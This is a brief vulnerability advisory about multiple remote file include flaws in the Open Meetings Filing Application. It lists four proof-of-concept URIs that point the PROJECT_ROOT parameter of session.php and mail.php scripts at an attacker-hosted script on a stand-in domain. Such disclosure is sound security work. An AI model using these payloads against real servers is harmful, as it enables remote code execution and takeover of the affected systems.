|
Open Meetings Filing Application Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client. The following proof-of-concept URIs are available: http://www.example.com/[script_path]/editmeetings/session.php?PROJECT_ROOT=http://www.example2.com/evil_script? http://www.example.com/[script_path]/email/session.php?PROJECT_ROOT=http://www.example2.com/evil_script? http://www.example.com/[script_path]/entityproperties/session.php?PROJECT_ROOT=http://www.example2.com/evil_script? http://www.example.com/[script_path]/inc/mail.php?PROJECT_ROOT=http://www.example2.com/evil_script? |
|
Privacy Statement |